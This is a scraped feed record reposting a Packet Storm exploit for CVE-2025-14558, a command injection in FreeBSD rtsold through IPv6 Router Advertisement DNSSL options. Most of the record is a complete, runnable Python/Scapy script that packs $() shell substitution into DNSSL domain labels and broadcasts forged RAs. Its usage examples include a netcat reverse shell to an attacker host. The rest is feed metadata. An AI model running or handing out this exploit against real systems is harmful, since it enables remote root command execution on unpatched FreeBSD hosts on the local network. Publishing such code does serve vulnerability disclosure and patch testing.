{“lastseen”:”2026-01-07T21:45:01″,”description”:”rtsold8 on FreeBSD processes IPv6 Router Advertisement DNSSL options without validating domain names for shell metacharacters. The decoded domains are passed to resolvconf8, a shell script that uses unquoted variable expansion, enabling command…”,”published”:”2026-01-07T00:00:00″,”modified”:”2026-01-07T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 FreeBSD rtsold 15.x Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:213577″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-14558″],”sourceData”:”# Exploit Title: FreeBSD rtsold 15.x – Remote Code Execution via DNSSL\\n # Date: 2025-12-16\\n # Exploit Author: Lukas Johannes M\u00f6ller\\n # Vendor Homepage: https:\/\/www.freebsd.org\/\\n # Version: FreeBSD 13.x, 14.x, 15.x (before 2025-12-16 patches)\\n # Tested on: FreeBSD 14.1-RELEASE\\n # CVE: CVE-2025-14558\\n #\\n # Description:\\n # rtsold(8) processes IPv6 Router Advertisement DNSSL options without\\n # validating domain names for shell metacharacters. The decoded domains\\n # are passed to resolvconf(8), a shell script that uses unquoted variable\\n # expansion, enabling command injection via $() substitution.\\n #\\n # Requirements:\\n # – Layer 2 adjacency to target\\n # – Target running rtsold with ACCEPT_RTADV enabled\\n # – Root privileges (raw socket for sending RA)\\n # – Python 3 + Scapy\\n #\\n # References:\\n # https:\/\/security.FreeBSD.org\/advisories\/FreeBSD-SA-25:12.rtsold.asc\\n # https:\/\/github.com\/JohannesLks\/CVE-2025-14558\\n \\n import argparse\\n import struct\\n import sys\\n import time\\n \\n try:\\n from scapy.all import (\\n Ether, IPv6, ICMPv6ND_RA, ICMPv6NDOptPrefixInfo,\\n ICMPv6NDOptSrcLLAddr, Raw, get_if_hwaddr, sendp\\n )\\n except ImportError:\\n sys.exit(\\”[!] Scapy required: pip install scapy\\”)\\n \\n \\n def encode_domain(name):\\n \\”\\”\\”Encode domain in DNS wire format (RFC 1035).\\”\\”\\”\\n result = b\\”\\”\\n for label in name.split(\\”.\\”):\\n if label:\\n data = label.encode()\\n result += bytes([len(data)]) + data\\n return result + b\\”\\\\x00\\”\\n \\n \\n def encode_payload(cmd):\\n \\”\\”\\”Encode payload as DNS label with $() wrapper for command substitution.\\”\\”\\”\\n payload = f\\”$({cmd})\\”.encode()\\n if len(payload) \\u003e 63:\\n # Split long payloads across labels (dots inserted on decode)\\n result = b\\”\\”\\n while payload:\\n chunk = payload[:63]\\n payload = payload[63:]\\n result += bytes([len(chunk)]) + chunk\\n return result + b\\”\\\\x00\\”\\n return bytes([len(payload)]) + payload + b\\”\\\\x00\\”\\n \\n \\n def build_dnssl(cmd, lifetime=0xFFFFFFFF):\\n \\”\\”\\”Build DNSSL option (RFC 6106) with injected command.\\”\\”\\”\\n data = encode_domain(\\”x.local\\”) + encode_payload(cmd)\\n \\n # Pad to 8-byte boundary\\n pad = (8 – (len(data) + 8) % 8) % 8\\n data += b\\”\\\\x00\\” * pad\\n \\n # Type=31 (DNSSL), Length in 8-octet units\\n length = (8 + len(data)) \/\/ 8\\n return struct.pack(\\”\\u003eBBH\\”, 31, length, 0) + struct.pack(\\”\\u003eI\\”, lifetime) + data\\n \\n \\n def build_ra(mac, payload):\\n \\”\\”\\”Build Router Advertisement with malicious DNSSL.\\”\\”\\”\\n return (\\n Ether(src=mac, dst=\\”33:33:00:00:00:01\\”)\\n \/ IPv6(src=\\”fe80::1\\”, dst=\\”ff02::1\\”, hlim=255)\\n \/ ICMPv6ND_RA(chlim=64, M=0, O=1, routerlifetime=1800)\\n \/ ICMPv6NDOptSrcLLAddr(lladdr=mac)\\n \/ ICMPv6NDOptPrefixInfo(\\n prefixlen=64, L=1, A=1,\\n validlifetime=2592000, preferredlifetime=604800,\\n prefix=\\”2001:db8::\\”\\n )\\n \/ Raw(load=build_dnssl(payload))\\n )\\n \\n \\n def main():\\n p = argparse.ArgumentParser(\\n description=\\”CVE-2025-14558 – FreeBSD rtsold DNSSL Command Injection\\”,\\n epilog=\\”Examples:\\\\n\\”\\n \\” %(prog)s -i eth0\\\\n\\”\\n \\” %(prog)s -i eth0 -p ‘id\\u003e\/tmp\/pwned’\\\\n\\”\\n \\” %(prog)s -i eth0 -p ‘nc LHOST 4444 -e \/bin\/sh’\\”,\\n formatter_class=argparse.RawDescriptionHelpFormatter\\n )\\n p.add_argument(\\”-i\\”, \\”–interface\\”, required=True, help=\\”Network interface\\”)\\n p.add_argument(\\”-p\\”, \\”–payload\\”, default=\\”touch \/tmp\/pwned\\”, help=\\”Command to execute\\”)\\n p.add_argument(\\”-c\\”, \\”–count\\”, type=int, default=3, help=\\”Packets to send (default: 3)\\”)\\n args = p.parse_args()\\n \\n try:\\n mac = get_if_hwaddr(args.interface)\\n except Exception as e:\\n sys.exit(f\\”[!] Interface error: {e}\\”)\\n \\n print(f\\”[*] Interface: {args.interface} ({mac})\\”)\\n print(f\\”[*] Payload: {args.payload}\\”)\\n \\n pkt = build_ra(mac, args.payload)\\n \\n for i in range(args.count):\\n sendp(pkt, iface=args.interface, verbose=False)\\n print(f\\”[+] Sent RA {i+1}\/{args.count}\\”)\\n if i \\u003c args.count – 1:\\n time.sleep(1)\\n \\n print(\\”[+] Done\\”)\\n \\n \\n if __name__ == \\”__main__\\”:\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213577″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213577\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-07T21:45:01″,”description”:”rtsold8 on FreeBSD processes IPv6 Router Advertisement DNSSL options without validating domain names for shell metacharacters. The decoded domains are passed to resolvconf8, a shell…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-34540","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n